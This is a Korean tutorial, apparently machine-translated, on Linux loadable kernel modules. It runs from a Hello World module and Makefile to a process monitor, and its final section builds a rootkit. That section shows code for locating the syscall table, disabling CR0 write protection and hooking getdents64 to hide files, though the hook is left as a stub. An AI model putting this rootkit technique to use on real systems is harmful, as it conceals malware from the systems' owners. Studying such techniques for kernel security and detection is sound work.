LKM Addict, lkm의 기본을 배워요-C++-php.cn

안녕하세요 여러분! 오늘은 간단한 "Hello World" 모듈부터 LKM 루트킷 생성까지 LKM(로드 가능한 커널 모듈)을 안내하겠습니다. 이 내용이 도움이 되었다면 자유롭게 공유해 주시고, 끝까지 읽어주신 모든 분들께 미리 감사드립니다. 게시물 하단에 링크된 모든 코드와 참조 자료가 있으므로 소스를 꼭 확인하세요. 저를 믿으세요. 이를 자세히 살펴보고 코드를 수정하면 더 많은 것을 배우는 데 정말 도움이 될 것입니다. 하지만 주의하세요. 일부 코드는 GPL 3 라이센스를 따르므로 해당 약관을 숙지하고 있어야 합니다.

필요한 것:

리눅스-헤더-일반
C 컴파일러(GCC 또는 cc를 권장합니다)

1) LKM이란 무엇이며 어떻게 작동하나요
2) LKM Makefile 예시
3) 모듈이 커널에 로드되는 방법
4) LKM "Hello World"
5) 지난 몇 년간의 주요 변화
6) Kernel 5.7의 Syscall 테이블 변경
7) 공정 모니터링을 위한 LKM
8) LKM 루트킷 구축

1) LKM이란 무엇이며 어떻게 작동합니까?

LKM은 전체 커널을 다시 컴파일할 필요 없이 하드웨어용 드라이버를 추가하는 등 Linux 커널의 기능을 확장하는 데 도움이 되는 로드 가능한 커널 모듈입니다. 장치 드라이버(예: 사운드 카드), 파일 시스템 등에 적합합니다. 모든 LKM에는 최소한 다음 두 가지 기본 기능이 필요합니다.

static int __init module_init(void)
{
    return 0;
}

static void __exit module_exit(void)
{
}

로그인 후 복사

2) LKM 메이크파일 예:

다음은 모듈 컴파일을 위한 매우 간단한 Makefile입니다.

obj-m := example.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)

all:
 $(MAKE) -C $(KDIR) M=$(PWD) modules

clean:
 $(MAKE) -C $(KDIR) M=$(PWD) clean

로그인 후 복사

3) 모듈이 커널에 로드되는 방법:

lsmod 명령을 사용하면 커널에 로드된 모듈을 볼 수 있습니다. /proc/modules의 정보를 확인합니다. 모듈은 일반적으로 다음과 같은 별칭을 통해 커널을 식별합니다.

별칭 char-major-10–30 소프트독

이것은 modprobe에게 Softdog.o 모듈이 로드되어야 함을 알리고 /lib/modules/version/modules.dep에서 depmod -a를 실행하여 생성된 종속성을 확인합니다.

4) LKM "안녕하세요 세계":

초기본적인 'Hello World' 모듈을 만드는 방법은 다음과 같습니다.

#include <linux/module.h> 
#include <linux/kernel.h> 
#include <linux/init.h>   

static int __init hello_init(void)
{
    printk(KERN_INFO "<1>Hello World\n");
    return 0;
}

static void __exit hello_exit(void)
{
    printk(KERN_INFO"<1> Bye bye!");
}

module_init(hello_init);
module_exit(hello_exit);

MODULE_AUTHOR("BrunoCiccarino");
MODULE_LICENSE("GPL");

로그인 후 복사

5) 수년간 LKM의 주요 변화:

시간이 지남에 따라 LKM에는 상당히 중요한 변화가 있었으므로 이를 Linux 커널 버전별로 분류해 보겠습니다.

커널 2.x(최대 2.6):

동적 LKM 로드 및 언로드에 대한 초기 지원
더 나은 디버깅 도구(OOPS, PANIC).
커널 2.6.x:

보다 나은 기기 관리를 위한 udev를 소개합니다.
더 빠른 응답 시간을 위한 선점형 커널.
NPTL(네이티브 Posix 스레드 라이브러리)은 다중 스레드 프로세스 처리를 개선합니다.
커널 3.x:

네임스페이스 지원, Docker와 같은 컨테이너 기술 개선
파일 시스템 및 GPU 드라이버 개선.
커널 4.x:

KASLR을 통해 커널 보안이 강화됩니다.
더 나은 컨테이너 지원(Cgroups, 네임스페이스).
새로운 하드웨어를 지원합니다.
커널 5.x:

더 나은 파일 시스템 암호화 및 라이브 패치.
단순한 네트워크를 넘어 BPF 확장.
RISC-V 및 ARM 지원이 향상되었습니다.
커널 5.7:

주요 변경 사항: 보안상의 이유로 syscall 테이블(sys_call_table)에 대한 액세스가 더 어려워졌습니다. syscall 테이블을 수정해야 하는 모듈을 조정해야 했습니다.
커널 6.x:

더 안전한 커널 모듈 개발을 위한 Rust 언어 지원
모바일 장치의 에너지 효율성에 중점을 두고 보안 및 격리를 개선했습니다.

6) 커널 5.7의 Syscall 테이블 변경 사항:

Linux 5.7에서는 syscall 테이블을 보호하기 위해 변경되었습니다. 이제 쓰기 금지되어 있어 쉽게 액세스할 수 없습니다. 이는 보안 측면에서는 큰 이점이지만 이에 의존하는 합법적인 모듈에서는 복잡한 문제입니다. sys_call_table을 찾기 위해 kprobes.h를 사용했다면 새로운 전략이 필요합니다. 이제는 쓰기 방지(WP)와 같은 보호 기능으로 인해 직접 수정할 수 없습니다.

7) 공정 모니터링을 위한 LKM:

타이머를 사용하여 주기적으로(예: 2초마다) 검사를 실행하여 커널의 프로세스를 모니터링하는 모듈입니다. 프로세스 생성 및 종료, 파일 액세스, 네트워크 사용 등을 감시합니다.

이를 시작하는 데 도움이 되는 몇 가지 코드는 다음과 같습니다.

#include <linux/module.h>
#include <linux/sched.h>
#include <linux/timer.h>
#include <linux/cred.h>

static struct timer_list procmonitor_timer;

static void procmonitor_check_proc_tree(unsigned long unused)
{
    struct task_struct *task;
    for_each_process(task)
        printk(KERN_INFO "process: %s, PID: %d\n", task->comm, task->pid);

    mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(2000));
}

static int __init procmonitor_init(void)
{
    setup_timer(&procmonitor_timer, procmonitor_check_proc_tree, 0);
    mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(200));
    return 0;
}

static void __exit procmonitor_exit(void)
{
    del_timer_sync(&procmonitor_timer);
}

module_init(procmonitor_init);
module_exit(procmonitor_exit);

로그인 후 복사

8) LKM 루트킷:

루트킷은 기본적으로 악성 코드를 숨기기 위해 시스템 호출을 하이재킹하는 악성 모듈입니다. syscall 테이블에 연결하여 동작을 수정하는 방법은 다음과 같습니다.

먼저 syscall 테이블을 찾아야 합니다.

unsigned long *find_syscall_table(void)
{
    typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
    kallsyms_lookup_name_t kallsyms_lookup_name;
    register_kprobe(&kp);
    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
    unregister_kprobe(&kp);
    return (unsigned long*)kallsyms_lookup_name("sys_call_table");
}

로그인 후 복사

그런 다음 syscall 테이블이 있는 메모리를 보호 해제할 수 있습니다.

static inline void unprotect_memory(void)
{
    write_cr0_forced(cr0 & ~0x00010000);
}

로그인 후 복사

그런 다음 원래 기능을 후크로 교체하세요.

static int __init ghost_init(void)
{
    __syscall_table = find_syscall_table();
    if (!__syscall_table) return -1;

    cr0 = read_cr0();
    orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];
    unprotect_memory();
    __syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;
    protect_memory();
    return 0;
}

로그인 후 복사

후크 기능은 파일을 가로채서 숨깁니다.

asmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
    int ret = orig_getdents64(fd, dirp, count);
    // Intercept the syscall here...
    return ret;
}

로그인 후 복사

LKM Addict, learning the basics of lkm